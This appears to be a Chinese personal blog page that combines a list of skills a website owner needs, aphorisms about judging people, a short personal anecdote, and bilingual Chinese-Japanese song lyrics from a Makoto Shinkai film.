7、至少熟悉一种数据库(ACESS,MSSQL,MYSQL,ORACLE……)。
8、能用PHOTOSHOP、flash等制作一些基本的图片和动画。
9、熟悉SEO,至少能做简单网页优化。
10、对互联网有敏锐的洞察力。
11、了解用户的需求,能站在用户的角度考虑问题。
未完,待续……
总结一下,一个优秀个人网站站长,应该具备的基本技能与素质:
1、至少有1个以上的顶级域名(.com、.cn……均可)。
2、至少运营一个网站一年以上。
3、至少熟悉一种web服务器(IIS、apache、……)。
4、至少熟悉一种操作系统(windows、linux、……)。
5、至少了解一些基本的网页代码和脚本(HTML,javascript,css,……),并且能修改代码。
6、至少熟悉一种以上服务器端网页语言(ASP、ASP.NET、PHP、JSP、……)。
7、至少熟悉一种数据库(ACESS,MSSQL,MYSQL,ORACLE……)。
8、能用PHOTOSHOP、flash等制作一些基本的图片和动画。
9、熟悉SEO,至少能做简单网页优化。
10、对互联网有敏锐的洞察力。
11、了解用户的需求,能站在用户的角度考虑问题。
未完,待续……
××××××××××××××××给我好好想想自己最想要的。。。××××××××××××××××
看一个国家的国民教育,要看他的公共厕所。
看一个男人的品味,要看他的袜子。
看一个女人是否养尊处优,要看她的手。
看一个人的气血,要看他的头发。
看一个人的心术,要看他的眼神。
看一个人的身价,要看他的对手。
看一个人的底牌.要看他身边的好友。
看一个人的性格,要看他的字写得怎样。
看一个人是否快乐,不要看笑容,要看清晨梦醒时的一刹那表情。
看一个人的胸襟,要看他如何面对失败及被人出卖。
看两个人的关系,要看发生意外时,另一方的紧张程度。
本站现在开通网站域名:www.1891.008.net(要发就要连连发,嘿嘿!!!)
今天,同学也是玩得好得听说是给录取入民航大学了,开飞机,哈哈,我可是有点好处,我都说能得啊,最后,果然能够了,嘻嘻,打造和东哥混的人都是NIU人的大好局面。。。。
作曲/編曲 天 門
作詞 新海 誠
補編曲 岡澤敏夫
逐渐凝入晚霞下的蓝空中白云 遥远的那天的颜色
色あせた青ににじむ 白い雲 遠いあの曰のいろ
心中隐藏着任何人都不知道的痛
心の奥の誰にも 隠してる痛み
我用尽一切的言语 也已远去
僕のすべてかけた 言葉もう遠く
寄托着心情的每一天 现在你依然 温暖着我
なくす曰々の中で今も きみは 僕をあたためてる
你的声音 你的身影 照耀的光
きみのこえ きみのかたち 照らした光
若能实现 我的声音 希望能传给在某处的你
かなうなら 僕のこえ どこかのきみ とどくように
我活下去
僕は生きてく
阳光照射下灼热的铁轨 声音渐远 那天的声音
曰差しに灼けたレールから 響くおと遠く あの曰のこえ
那云的彼岸 现在依然是约定的地方
あの雲のむこう今でも 約束の場所ある
不知何时起 孤独纠缠着我 不平静的心
いつからか孤独 僕を囲み きしむ心
在过去的时光中 一定是我已渐渐失去你
過ぎる時の中できっと 僕はきみをなくしていく
你的头发 天空和云 溶化的世界 充满神秘地
きみの髪 空と雲 とかした世界 秘密に満ちて
你的声音 温柔的手指 和风般的肌肤
きみのこえ やさしい指 風うける肌
心变得坚强
こころ強くする
いつまでも こころ震わす きみの背中
希望 我的歌 能传达给某处的你
願いいただ 僕の歌 どこかのきみ とどきますよう
我活下去
僕は生きてく
你的声音 你的身影 照耀的光
きみのこえ きみのかたち 照らした光
若能实现 纵然分隔两地 我也要 温柔地坚强
かなうなら 生きる場所 違うけれど 優しく強く
活下去
僕は生きたい
